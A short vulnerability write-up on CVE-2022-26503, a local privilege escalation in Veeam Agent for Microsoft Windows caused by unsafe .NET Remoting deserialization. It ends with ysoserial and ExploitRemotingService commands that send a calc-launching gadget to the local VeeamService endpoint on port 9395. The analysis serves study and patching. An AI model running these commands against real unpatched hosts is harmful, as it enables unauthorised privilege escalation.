CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

Series - Veeam
Note
This article was last updated on 2022-03-22; its contents may be out of date.

Continuing from the previous post.

Vulnerability analysis

Patch

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/1.png

Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTcpChannelOptions)

The patch drops the server formatter sink configured with TypeFilterLevel.Full and replaces it with a new deserialization sink class, CBinaryServerFormatterSink. TypeFilterLevel.Full is the root cause: it lets a .NET Remoting client hand the server an arbitrary BinaryFormatter object graph, which the channel deserializes before the call is ever dispatched, so any known BinaryFormatter gadget chain runs in the service process.

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/2.png

The channel is registered as secure, so a client needs a valid Windows user account and password to talk to it. Tracing port upwards leads to:

Veeam.Backup.Common.COptions.BackupServerPort

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/3.png

The value is read from the registry: 9395.

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/4.png

The service log, C:\ProgramData\Veeam\Endpoint\Svc.VeeamEndpointBackup.log, shows the channel listens only on 127.0.0.1, so this is usable only for local privilege escalation, not over the network.

Next, find the URI of the remoting object: VeeamService.

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/5.png

Exploitation

Use https://github.com/tyranid/ExploitRemotingService and hit it directly. ysoserial.exe builds a BinaryFormatter gadget chain (TextFormattingRunProperties, which launches calc), and ExploitRemotingService sends it as a raw serialized payload over the secure channel at tcp://127.0.0.1:9395/VeeamService, authenticating with a local account as the channel requires:

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/6.png

ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter -c calc
ExploitRemotingService.exe --secure --user .\administrator --pass admin16!@# -useser tcp://127.0.0.1:9395/VeeamService raw ...

My writing is poor, my wording flippant, the content shallow and the hands-on work clumsy. Corrections and pointers from the masters are welcome; many thanks.